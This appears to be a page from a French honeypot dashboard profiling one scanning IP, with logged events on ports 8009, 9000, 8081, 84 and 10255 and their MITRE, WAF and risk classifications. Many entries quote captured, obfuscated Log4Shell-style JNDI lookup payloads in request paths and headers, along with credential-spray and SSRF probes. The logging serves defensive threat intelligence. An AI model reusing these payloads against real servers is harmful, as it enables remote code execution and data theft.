Profil de menace
Activité suspecte — risque 53/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Période analysée : 2026-07-02 → 2026-08-01
Activité suspecte — risque 53/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Campagne de scan — plusieurs IP du même /24 (34.19.127.0/24, ≥3 pairs)
Activité suspecte — risque 53/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance 64 % — Score WAF 72 · Bonus corrélation +10 · 3 tag(s) WAF
ASN 396982 · 34.19.0.0/17 · ARIN — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 259 événements sur la période pour cette IP.
Même FAI Google LLC — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
259 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
259 événement(s) — page 3/6
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 8009 · AJP | ajp | Injection PHP php injection · via AJP:8009 · (tentative d'exploit) | Faible | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
Émulateur
AJP
WAF
—
Recommandation
Investiguer
Tags
—
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
8009
Chemin / cible
—
Service
AJP
Payload
ZSDLKFJ2 /${${zkel:d5:8rm:-j}${b:uk97:m:-n}${c:mx7:-d}${9cni:cl:-i}${pkmf:-:}${snhy:-l}${s:-d}${zfmc:-a}${x:-p}${7u:3:ph1:-:}${v
Pourquoi cette classification : Type « php_injection » (signaux protocolaires) · confiance 97%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 52
Confiance : Confiance 97 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 933135
User-Agent
—
Règles WAF
—
Payload (extrait)
ZSDLKFJ2 /${${zkel:d5:8rm:-j}${b:uk97:m:-n}${c:mx7:-d}${9cni:cl:-i}${pkmf:-:}${snhy:-l}${s:-d}${zfmc:-a}${x:-p}${7u:3:ph1:-:}${v
Requête brute (extrait)
ZSDLKFJ2 /${${zkel:d5:8rm:-j}${b:uk97:m:-n}${c:mx7:-d}${9cni:cl:-i}${pkmf:-:}${snhy:-l}${s:-d}${zfmc:-a}${x:-p}${7u:3:ph1:-:}${v6:-/}${andf:liae:-/}${2e:3xs:7i:-P}${r:-A}${vj:-l}${p4i:zf:-0}${9:fe5:-c}${57:6:--}${${5eu:-s}${rwfq:ob5:-y}${5q:-s}${t43:-:}${j
|
|||||||
| TCP | 8009 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:8009 · (sonde / probe) · → /login | Élevée | Élevé · 68 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8009
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8009 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Int
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8009 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2842 Content-Type: |
|||||||
| TCP | 8009 · HTTP | http | Sonde port 8009/TCP port 8009 tcp · via HTTP:8009 · (sonde / probe) · → /${${g63:gj3:-j}${u:-n}${id3:-d}${xr:j83:hk:-i}… | Élevée | Moyen · 58 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${g63:gj3:-j}${u:-n}${id3:-d}${xr:j83:hk:-i}${l5:7:tuo:-:}${p:pd:af:-l}${8ob:ts90:q:-d}${5j:1:5d… UA ${${hcm:9j:u3:-j}${2kw:b:-n}${d:lw:45:-d}${0z:-i}${2cuk:-:}${9g…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${g63:gj3:-j}${u:-n}${id3:-d}${xr:j83:hk:-i}${l5:7:tuo:-:}${p:pd:af:-l}${8ob:ts90:q:-d}${5j:1:5dh:-a}${v1z6:6f0:n5wt:-p}${fky:-:}${n9sw:tq:-/}${rc:dtw:s:-/}${c9:tp:-P}${ab:-A}${zg:-l}${g:-0}${c:-c}${h9vl:fs1:--}${${t:3o0c:-s}${glr:om:-y}${fm:kx:-s}${vs3c:x10:-:}${5:xob:5xcb:-j}${p5:q3g:-a}${a:0gb:8:-v}${5:7l:-a}${694:f8y:-.}${c:rmbq:r2vp:-v}${72nj:2r:3:-e}${2:-r}${tls:e:gpz1:-s}${nf8:sc:-i}${o:xks:x01:-o}${ner2:zin:-n}}${q3:fart:-.}${hw:-3}${uxmy:-1}${w1yu:-e}${sobg:uvb:9:-7}${6h:oxr5:wm:-c}${45v:k4f1:-5
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8009
Chemin / cible
/${${g63:gj3:-j}${u:-n}${id3:-d}${xr:j83:hk:-i}${l5:7:tuo:-:}${p:pd:af:-l}${8ob:ts90:q:-d}${5j:1:5dh:-a}${v1z6:6f0:n5wt:-p}${fky:-:}${n9sw:tq:-/}${rc:dtw:s:-/}…
Preuve honeypot — Sonde port 8009/TCP
Connexion détectée sur le port 8009 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8009_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 58
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${hcm:9j:u3:-j}${2kw:b:-n}${d:lw:45:-d}${0z:-i}${2cuk:-:}${9g:-l}${tic:-d}${tn2b:7g3:-a}${zcsk:i:-p}${ejn:senb:f5:-:}${r:k6:-/}${uhcs:-/}${dae:1x:d:-U}${2ngz:p5i:fuhl:-A}${j20:-l}${qdoa:mr7d:-0}${i…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${g63:gj3:-j}${u:-n}${id3:-d}${xr:j83:hk:-i}${l5:7:tuo:-:}${p:pd:af:-l}${8ob:ts90:q:-d}${5j:1:5dh:-a}${v1z6:6f0:n5wt:-p}$
Requête brute (extrait)
GET /${${g63:gj3:-j}${u:-n}${id3:-d}${xr:j83:hk:-i}${l5:7:tuo:-:}${p:pd:af:-l}${8ob:ts90:q:-d}${5j:1:5dh:-a}${v1z6:6f0:n5wt:-p}${fky:-:}${n9sw:tq:-/}${rc:dtw:s:-/}${c9:tp:-P}${ab:-A}${zg:-l}${g:-0}${c:-c}${h9vl:fs1:--}${${t:3o0c:-s}${glr:om:-y}${fm:kx:-s}$
|
|||||||
| TCP | 8009 · HTTP | http | Sonde port 8009/TCP port 8009 tcp · via HTTP:8009 · (sonde / probe) | Élevée | Moyen · 45 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
POST / UA ${${2:ua9v:tdu6:-j}${m2rv:-n}${0b7:-d}${8ey:-i}${o2:-:}${l1:o3:…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
8009
Chemin / cible
/
Preuve honeypot — Sonde port 8009/TCP
Connexion détectée sur le port 8009 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8009_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 45
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${2:ua9v:tdu6:-j}${m2rv:-n}${0b7:-d}${8ey:-i}${o2:-:}${l1:o3:-l}${aj5:-d}${gm2p:swzy:t8:-a}${kf:ti9d:i:-p}${oi:r:-:}${hs:-/}${x:g54:ufm:-/}${3f:63j:71f:-U}${luia:2:ces:-A}${80:-l}${ua:-0}${v87:5zi0…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8009
Accept: */*
User-Agent: ${${2:ua9v:tdu6:-j}${m2rv:-n}${0
Requête brute (extrait)
POST / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8009 Accept: */* User-Agent: ${${2:ua9v:tdu6:-j}${m2rv:-n}${0b7:-d}${8ey:-i}${o2:-:}${l1:o3:-l}${aj5:-d}${gm2p:swzy:t8:-a}${kf:ti9d:i:-p}${oi:r:-:}${hs:-/}${x:g54:ufm:-/}${3f:63j:71f:-U}${l
|
|||||||
| TCP | 8009 · HTTP | http | Sonde port 8009/TCP port 8009 tcp · via HTTP:8009 · (sonde / probe) · → /${${iw:8s:-j}${rw1:s:-n}${1:joe:0k:-d}${z9o:-i… | Élevée | Moyen · 58 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${iw:8s:-j}${rw1:s:-n}${1:joe:0k:-d}${z9o:-i}${y:-:}${a:c9:-l}${h6v:yjc:-d}${fm:j3:-a}${06z:xlr6… UA ${${9k58:xn:h7:-j}${30:vmit:-n}${g3j2:nj:kv5:-d}${n:4fus:qd:-i}…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${iw:8s:-j}${rw1:s:-n}${1:joe:0k:-d}${z9o:-i}${y:-:}${a:c9:-l}${h6v:yjc:-d}${fm:j3:-a}${06z:xlr6:-p}${xd95:-:}${d6q:-/}${4z:ybi:834:-/}${0:-P}${3:p4e:-A}${o:u6:tr5:-l}${cz:e:-0}${k:-c}${f:xyfr:ro7:--}${${ir:ydj:d9:-s}${3:-y}${zhac:mf:-s}${dxpm:9:-:}${txr:vi:c4q:-j}${9gr:94r2:8oef:-a}${7:xqr:-v}${pju:7z1:-a}${d:-.}${2:qlf:-v}${t:go:-e}${q93:-r}${o:2av9:-s}${enb:0pj:2:-i}${pb5a:qcki:stw:-o}${ly:g:yux:-n}}${3b:mp9:9s:-.}${zeic:3:gmnv:-3}${hw:x:-1}${p:dl6:e:-e}${eh7:hu7j:8nr:-7}${a:rf:ac:-c}${b:mj:n:-5}${f:t
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8009
Chemin / cible
/${${iw:8s:-j}${rw1:s:-n}${1:joe:0k:-d}${z9o:-i}${y:-:}${a:c9:-l}${h6v:yjc:-d}${fm:j3:-a}${06z:xlr6:-p}${xd95:-:}${d6q:-/}${4z:ybi:834:-/}${0:-P}${3:p4e:-A}${o…
Preuve honeypot — Sonde port 8009/TCP
Connexion détectée sur le port 8009 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8009_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 58
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${9k58:xn:h7:-j}${30:vmit:-n}${g3j2:nj:kv5:-d}${n:4fus:qd:-i}${c:ji:-:}${8rxj:q9:-l}${pk:-d}${1:da7p:r:-a}${e:-p}${g49:lx1q:805:-:}${re:i2:-/}${7yjd:-/}${3oiz:ny2:f:-U}${3u:-A}${q9:6z9:4r6:-l}${8ju…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${iw:8s:-j}${rw1:s:-n}${1:joe:0k:-d}${z9o:-i}${y:-:}${a:c9:-l}${h6v:yjc:-d}${fm:j3:-a}${06z:xlr6:-p}${xd95:-:}${d6q:-/}${
Requête brute (extrait)
GET /${${iw:8s:-j}${rw1:s:-n}${1:joe:0k:-d}${z9o:-i}${y:-:}${a:c9:-l}${h6v:yjc:-d}${fm:j3:-a}${06z:xlr6:-p}${xd95:-:}${d6q:-/}${4z:ybi:834:-/}${0:-P}${3:p4e:-A}${o:u6:tr5:-l}${cz:e:-0}${k:-c}${f:xyfr:ro7:--}${${ir:ydj:d9:-s}${3:-y}${zhac:mf:-s}${dxpm:9:-:}
|
|||||||
| TCP | 8009 · HTTP | http | Sonde port 8009/TCP port 8009 tcp · via HTTP:8009 · (sonde / probe) | Élevée | Moyen · 47 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8009
Chemin / cible
/
Preuve honeypot — Sonde port 8009/TCP
Connexion détectée sur le port 8009 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8009_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 47
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8009 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8009 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${c3gj:73l:-j}${s:-n}${
|
|||||||
| TCP | 8009 · HTTP | http | Sonde port 8009/TCP port 8009 tcp · via HTTP:8009 · (sonde / probe) | Élevée | Moyen · 45 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA ${${kdwt:fgpo:-j}${zsai:n1:-n}${u2ir:e2:-d}${ndz:-i}${e0x1:3fg:…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8009
Chemin / cible
/
Preuve honeypot — Sonde port 8009/TCP
Connexion détectée sur le port 8009 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_8009_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
68%
Corrélation +18
Risque capteur
Moyen
· 45
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${kdwt:fgpo:-j}${zsai:n1:-n}${u2ir:e2:-d}${ndz:-i}${e0x1:3fg:yra:-:}${d3:t7:z0:-l}${y:-d}${fz:j8:ly:-a}${e:en:-p}${w:-:}${qg0:h45:ma:-/}${c:z:qw:-/}${1:qih:zo:-U}${6b:ph:-A}${05:-l}${7:oy94:6:-0}${…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8009
Accept: */*
User-Agent: ${${kdwt:fgpo:-j}${zsai:n1:-n}${u
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8009 Accept: */* User-Agent: ${${kdwt:fgpo:-j}${zsai:n1:-n}${u2ir:e2:-d}${ndz:-i}${e0x1:3fg:yra:-:}${d3:t7:z0:-l}${y:-d}${fz:j8:ly:-a}${e:en:-p}${w:-:}${qg0:h45:ma:-/}${c:z:qw:-/}${1:qih:zo:
|
|||||||
| TCP | 9000 · HTTP | http | SSRF interne ssrf internal · via HTTP:9000 · (tentative d'exploit) | Élevée | Moyen · 53 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9000
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 53
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:9000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:9000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 8081 · HTTP | http | SSRF interne ssrf internal · via HTTP:8081 · (tentative d'exploit) | Élevée | Moyen · 55 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
8081
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
72%
Corrélation +18
Risque capteur
Moyen
· 55
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8081 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:8081 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 84 · HTTP | http | Scan de ports port scan syn · via HTTP:84 · (reconnaissance) | Élevée | Moyen · 55 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
84
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 55
Confiance : Confiance 100 % — 3 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:84 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac O
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:84 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 84 · HTTP | http | Scan de ports port scan syn · via HTTP:84 · (reconnaissance) | Élevée | Moyen · 55 |
|
|
|
Étape
Reconnaissance
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1046
TA0043
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
84
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « port_scan_syn » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Moyen
· 55
Confiance : Confiance 100 % — 3 tag(s) WAF
Signaux
MITRE-T1046
SIGMA-net-port-scan
Beh Multi Port 60S
Technique MITRE
T1046
Tactiques MITRE
TA0043
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:84 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:84 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 10255 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:10255 · (sonde / probe) · → /login | Élevée | Élevé · 71 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
10255
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +18
Risque capteur
Élevé
· 71
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; In
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10255 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Type: application/json Con |
|||||||
| TCP | 10255 · HTTP | http | deser php attack deser php attack · via HTTP:10255 · (tentative d'exploit) · → /${${kx:phb2:-j}${bxtd:6rib:9:-n}${0iqu:-d}${u:… | Élevée | Élevé · 71 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
PUT /${${kx:phb2:-j}${bxtd:6rib:9:-n}${0iqu:-d}${u:-i}${wy:-:}${1b:2q:k0:-l}${t:8:-d}${2lj:ta42:-a}${e:… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
33
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${kx:phb2:-j}${bxtd:6rib:9:-n}${0iqu:-d}${u:-i}${wy:-:}${1b:2q:k0:-l}${t:8:-d}${2lj:ta42:-a}${e:3isf:cv3:-p}${dns:c8:-:}${x5:mp:-/}${bjg:fm58:s:-/}${8zof:-P}${67q:e4ym:-A}${x:ep8r:t:-l}${yw:-0}${frso:-c}${hj:--}${${3bql:-s}${gaxt:dzi:-y}${9f8:48:-s}${v0qa:-:}${vm7c:1o:xg2p:-j}${7:tz:56:-a}${icx:k:-v}${r:-a}${k:7:-.}${rs:-v}${zr:l:-e}${rl2p:-r}${kye9:0:-s}${6n:z5:-i}${cid:4:3qpx:-o}${95:-n}}${a3j1:-.}${63:28lb:jmhg:-f}${6y:-2}${id:-f}${2w0:54n:yagp:-c}${5:y04x:-7}${gvh:-6}${r:y:4:-b}${s7c:5t:5hs1:-9}${2jm
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
10255
Chemin / cible
